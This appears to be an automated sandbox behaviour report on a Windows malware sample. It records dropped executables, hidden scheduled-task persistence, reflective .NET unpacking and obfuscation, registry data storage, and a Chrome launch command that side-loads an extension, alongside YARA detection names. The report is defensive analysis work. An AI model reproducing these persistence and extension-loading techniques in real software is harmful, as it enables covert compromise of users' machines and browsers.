Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: zlONcFaXkc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: zlONcFaXkc.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: zlONcFaXkc.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: zlONcFaXkc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: zcezeaqsuhi.exe, 00000002.00000000.1717795774.000002A5B9702000.00000002.00000001.01000000.00000008.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2015898421.000002A5BB410000.00000002.00000001.00040000.00000008.sdmp, zcezeaqsuhi.exe.1.dr
Source:	Binary string: mscorlib.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Lwbtkgrhgw.pdb source: zlONcFaXkc.exe, 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: Hider.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD304.tmp.dmp.9.dr
Source:	Binary string: protobuf-net.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WERD304.tmp.dmp.9.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: zlONcFaXkc.exe, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9b593b8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9b31380.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9b593b8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9c49428.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1c40000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9b31380.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666984608.000001DFA9511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1675426228.000001DFC1C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zlONcFaXkc.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR

Binary contains a suspicious time stamp

Source: zlONcFaXkc.exe

Static PE information: 0x89B686F2 [Fri Mar 20 05:04:50 2043 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B8AEF50 push cs; ret	0_2_00007FFD9B8AEF53
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9BA520A2 push eax; ret	0_2_00007FFD9BA520A3
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8C6B00 push eax; iretd	1_2_00007FFD9B8C6DCD
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8C6C69 push eax; iretd	1_2_00007FFD9B8C6DCD
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8D8169 push ebx; ret	1_2_00007FFD9B8D816A
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B88EF50 push cs; ret	1_2_00007FFD9B88EF53
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3792B push ebx; retf	1_2_00007FFD9BA3796A
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_00007FFD9B87095B push ebp; retf	2_2_00007FFD9B870961
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_00007FFD9B87126D push E95E53B6h; ret	2_2_00007FFD9B871299
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_00007FFD9B87096C push ebp; retf	2_2_00007FFD9B87096E

Source: zlONcFaXkc.exe	Static PE information: section name: .text entropy: 7.997352220653475
Source: Target.exe.0.dr	Static PE information: section name: .text entropy: 7.997352220653475

Persistence and Installation Behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000000.00000002.1665987392.000001DFA7B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zlONcFaXkc.exe PID: 7316, type: MEMORYSTR

Drops PE files

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	File created: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	File created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe			Jump to dropped file

Installs a Chrome extension

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"			Jump to behavior

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000000.00000002.1665987392.000001DFA7B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zlONcFaXkc.exe PID: 7316, type: MEMORYSTR

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868

Stores large binary data to the registry

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\cd738f7ec36d311b107bd6ec4b05793a 9F06F2D0565EA31B8A486D63B122AF45

Jump to behavior

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
